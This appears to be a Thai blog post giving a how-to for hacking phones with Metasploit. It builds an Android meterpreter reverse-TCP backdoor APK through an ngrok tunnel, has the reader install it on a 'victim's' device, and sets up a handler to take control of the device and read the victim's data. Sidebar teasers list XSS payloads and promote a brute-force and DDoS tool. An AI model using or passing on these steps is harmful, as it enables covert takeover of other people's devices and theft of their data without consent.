Metasploit Framework(วิธีใช้งาน)

ในบทความนี้ จะมาแสดงวิธีใช้งาน Metasploit Framework สำหรับแฮกคอมและมือถือ สิ่งแรกที่จะต้องทำคือสร้าง Playload หรือ BackDoor ไฟล์ เพื่อเอาไปติดตั้งลงในเครื่องของเหยื่อ

วิธีสร้าง Playload
$cd Metasploit-Framwork
$ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT='ngrok port' R >  /sdcard/yourapkname.apk
หมายเหตุ: คุณต้อง Forword Port ด้วย Ngrok ก่อนแล้วเอาเลขพอร์ตของ Ngrok มาใส่

หลังจากสร้าง Playload เรียบร้อยแล้ว ให้นำไปติดตั้งลงเครื่อง แล้วเข้าสู่หน้า console เพื่อทำการ Exploit เครื่องของเหยื่อ

วิธี Exploit เครื่องเหยื่อ
$ ./msfconsole
$msf - use exploit/multi/handler
$msf - set payload android/meterpreter/reverse_tcp
$msf - set lhost 0.tcp.ngrok.io
$msf - set lport ' your port which you have sent in ngrok  (eg. 4444)'
$msf - exploit

เมื่อคุณ Exploit เครื่องสำเร็จ คุณจะสามารถ ควบคุมเครื่องและดูข้อมูลของเหยื่อได้

ความคิดเห็น

  1. B20 เมษายน 2561 เวลา 17:56

    nice

    ตอบลบ
  2. Mr.Jammys13 กุมภาพันธ์ 2564 เวลา 13:05

    เจ๋งมากน้องแต่ก่อนพี่ก็แบบนี้เดี๋ยวนี้ไม่ค่อยตาม ช่องโหว่มันปิดไปเรื่อยเราต้องหาใหม่เรื่อยๆ สู้ๆนะน้อง

    ตอบลบ

แสดงความคิดเห็น

โพสต์ยอดนิยมจากบล็อกนี้

วิธีใช้ Termux สำหรับการแฮก

รูปภาพ
Termux Terminal Termux คือแอพพิเคชั่น ที่เอาไว้เปิด Linux Terminal แอพนี้สามารถใช้งานได้โดยไม่ต้องรูท สามารถใช้งานได้บน Android 5.0 ขึ้นไป Termux สามารถดาวโหลดได้บน playstore Setup แอพ Termux Terminal หลังจากได้โหลดแอพ Termux มาเรียบร้อย มันจะมาแค่ตัวแอพ แต่ไม่มี Tools สำหรับแฮกเพราะฉนั้นจึงจำเป็นที่จะต้อง Setup และ Install แพ็คเก็ตที่จำเป็น คำสั่ง Setup และ Install แพ็คเก็ต $apt-get upgrade $termux-setup-storage $apt-get install git $apt-get install wget $pip install wordlist $apt-get install python python2 $apt-get install hydra $apt-get dist-upgrade คำสั่งลง Tools Scrip $git clone (ตามด้วยลิ้งค์ GitHub) $wget (ตามด้วยลิ้งค์ GitHub)
อ่านเพิ่มเติม

XSS Payload for Hacking ครั้งที่ 1

XSS Payload for Hacking ครั้งที่ 1 XSS in HTML/Applications XSS Basic Basic payload < script > alert ( ' XSS ' ) < / script > < scr < script > ipt > alert ( ' XSS ' ) < / scr < script > ipt > " ><script>alert('XSS')</script> " >< script > alert ( String . fromCharCode ( 88 , 83 , 83 )) < / script > Img payload < img src = x onerror = alert ( ' XSS ' ); > < img src = x onerror = alert ( ' XSS ' ) // < img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x oneonerrorrror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x : alert (alt) onerror = eval (src) alt = xss > " ><img src=x onerror=alert('XSS');> " >< img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > Svg payload < svg onload = alert ( 1 ) > < svg / onload
อ่านเพิ่มเติม

วิธีติดตั้ง HPAS1369

รูปภาพ
HPAS1369 คือ Tools ที่ถูกสร้างเพื่อเอาไว้ทดสอบระบบ ถูกสร้างขึ้นโดย Zero Hacker (ผมเอง) ซึ้งสคริปนี้มีฟรีเจอร์อยู่ 4 อย่างคือ -Brute Force หารหัส -DDos Attack ยิงเว็บ ยิงเน็ต -NMap PortScanner แสกนพอร์ต NMap -Install Tools Hacking ติดตั้ง Tools อื่น คุณสามารถนำไปแฮกและทดสอบระบบได้ Tools นี้ไม่จำเป็นต้องรูท วิธีติดตั้ง $apt-get upgrade $apt-get install git python python2 $git clone https://github.com/DedSecCyber/HPAS1369 $cd HPAS1369 $sh install.sh มันก็จะติดตั้งโดยอัตโนมัท วิธีใช้ $python2 HPAS1369. py
อ่านเพิ่มเติม